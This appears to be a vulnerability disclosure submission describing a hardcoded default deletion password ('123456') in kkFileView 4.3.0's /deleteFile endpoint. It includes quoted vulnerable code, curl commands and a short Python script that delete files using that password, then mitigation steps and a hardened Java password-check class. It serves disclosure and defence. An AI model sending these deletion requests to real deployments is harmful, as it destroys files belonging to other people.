| Field | Value |
|---|---|
| Title | kkFileView 4.3.0 Weak Password Requirements |

**Description**:
**Title**: kkFileView 4.3.0 - Weak Authentication in File Deletion Function Leading to Arbitrary File Deletion
**Product**: kkFileView
**Version**: 4.3.0

---
### Vulnerability Details
#### Description
kkFileView version 4.3.0 contains a weak authentication mechanism in the file deletion functionality. The application uses a hardcoded default password "123456" for file deletion operations, which can be easily guessed or brute-forced by attackers. This vulnerability allows unauthenticated remote attackers to delete arbitrary files within the application's file storage directory without proper authorization.
#### Technical Details
The vulnerability exists in the `/deleteFile` endpoint of the FileController class:
**Vulnerable Code Location**: `server/src/main/java/cn/keking/web/controller/FileController.java`
```java
@GetMapping("/deleteFile")
public ReturnResponse<Object> deleteFile(String fileName, String password) {
    // ... validation ...
    // Case-insensitive comparison against the configured delete.password, which defaults to "123456"
    if (!ConfigConstants.getPassword().equalsIgnoreCase(password)) {
        logger.error("删除文件【{}】失败,密码错误!", fileName);
        return ReturnResponse.failure("删除文件失败,密码错误!");
    }
    // ... file deletion logic ...
}
```
**Default Password Configuration**: `server/src/main/config/application.properties`
```properties
# delete password
delete.password = ${KK_DELETE_PASSWORD:123456}
```
**Password Constant**: `server/src/main/java/cn/keking/config/ConfigConstants.java`
```java
public static final String DEFAULT_PASSWORD = "123456";
```
#### Attack Vectors
1. **Direct HTTP Request**:
```bash
curl "http://target:8012/deleteFile?fileName=ZGVtby90ZXN0LnBkZg==&password=123456"
```
2. **Automated Attack Script**:
```python
import requests
import base64

target = "http://target:8012"
files = ["demo/test.pdf", "demo/document.docx"]
for file in files:
    encoded = base64.b64encode(file.encode()).decode()
    requests.get(f"{target}/deleteFile?fileName={encoded}&password=123456")
```
#### Impact
- **Confidentiality**: No direct impact
- **Integrity**: High - Attackers can delete uploaded files
- **Availability**: Medium - Can disrupt file preview services
- **Authentication**: Complete bypass of deletion authorization
#### Affected Components
- File deletion endpoint: `/deleteFile`
- Default configuration files
- Password validation logic
---
### Proof of Concept
#### Step-by-Step Reproduction
1. Deploy kkFileView 4.3.0 with default configuration
2. Upload a test file using `/fileUpload` endpoint
3. Obtain file list using `/listFiles` endpoint
4. Delete any file using default password "123456":
```bash
curl "http://localhost:8012/deleteFile?fileName=ZGVtby90ZXN0LnBkZg==&password=123456"
```
#### Expected Result
File deletion should require proper authentication.
#### Actual Result
Files can be deleted using the weak default password.

---
### Solution
#### Immediate Mitigation
1. Change the default password in `application.properties` (or set the `KK_DELETE_PASSWORD` environment variable that the default entry reads):
```properties
delete.password = strong_unique_password_here
```
2. Disable file deletion if not required:
```properties
file.upload.disable = true
```
#### Recommended Fix
1. Implement proper user authentication system
2. Use strong password policies
3. Add rate limiting to prevent brute-force attacks
4. Implement audit logging for deletion operations
5. Use cryptographically secure tokens instead of passwords
#### Code Fix Example
```java
// Replace weak password check with proper authentication
@GetMapping("/deleteFile")
public ReturnResponse<Object> deleteFile(String fileName, HttpServletRequest request) {
    if (!isAuthenticated(request)) {
        return ReturnResponse.failure("Authentication required");
    }
    if (!hasDeletePermission(request)) {
        return ReturnResponse.failure("Insufficient permissions");
    }
    // ... proceed with deletion ...
}
```
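The fix example above leaves `isAuthenticated` and `hasDeletePermission` unspecified. As an added example that is not kkFileView's code, the class below shows the checks a hardened handler would run on the existing `delete.password` mechanism before touching the filesystem: refuse to operate while the shipped default is still configured, require a minimum length, compare case-sensitively in constant time instead of with `equalsIgnoreCase`, and write an audit line for every attempt. The class name, method names, minimum length and sample values are assumptions.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.logging.Logger;

/** Hypothetical guard a hardened /deleteFile handler would call before deleting anything. */
public final class DeletePasswordGuard {
    private static final Logger AUDIT = Logger.getLogger("kkfileview.audit");
    /** The value shipped in application.properties; a hardened build never accepts it. */
    private static final String SHIPPED_DEFAULT = "123456";
    private static final int MIN_LENGTH = 16; // assumed policy value

    public enum Verdict { OK, DEFAULT_PASSWORD_CONFIGURED, TOO_SHORT, MISMATCH }

    /**
     * @param configured value of delete.password as loaded from configuration
     * @param supplied   password parameter sent by the client (may be null)
     */
    public static Verdict check(String configured, String supplied, String fileName, String clientIp) {
        Verdict verdict = evaluate(configured, supplied);
        // Audit every attempt, accepted or not, without writing the secret itself to the log.
        AUDIT.info(String.format("deleteFile attempt ip=%s file=%s result=%s", clientIp, fileName, verdict));
        return verdict;
    }

    private static Verdict evaluate(String configured, String supplied) {
        // Fail closed while nothing, or the shipped default, is configured.
        if (configured == null || SHIPPED_DEFAULT.equals(configured)) {
            return Verdict.DEFAULT_PASSWORD_CONFIGURED;
        }
        if (configured.length() < MIN_LENGTH) {
            return Verdict.TOO_SHORT;
        }
        byte[] expected = configured.getBytes(StandardCharsets.UTF_8);
        byte[] given = supplied == null ? new byte[0] : supplied.getBytes(StandardCharsets.UTF_8);
        // Case-sensitive, constant-time comparison in place of equalsIgnoreCase.
        return MessageDigest.isEqual(expected, given) ? Verdict.OK : Verdict.MISMATCH;
    }

    public static void main(String[] args) {
        // Constructed sample values; the client IP and file name are placeholders.
        String strong = "Lq7!vZ2p#Rm9$xWcT4";
        System.out.println(check("123456", "123456", "demo/test.pdf", "198.51.100.7"));
        System.out.println(check(strong, "lq7!vz2p#rm9$xwct4", "demo/test.pdf", "198.51.100.7"));
        System.out.println(check(strong, strong, "demo/test.pdf", "198.51.100.7"));
    }
}
```

The first call is rejected because the default is still configured, the second because the case-folded guess no longer matches, and only the third is accepted.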

| Field | Value |
|---|---|
| Source | https://github.com/rassec2/kkfile/edit/main/4.3kkfile.md |
| User | yudeshui (UID 91129) |
| Submission | 30/09/2025 09:24 AM (7 months ago) |
| Moderation | 19/10/2025 04:53 AM (19 days later) |
| Status | Duplicate |
| VulDB Entry | 207741 [kkFileView 4.0.0 FileController.java fileName denial of service] |
| Reason | Product not identifiable. Please reply with name and website of the affected product. |
| Points | 0 |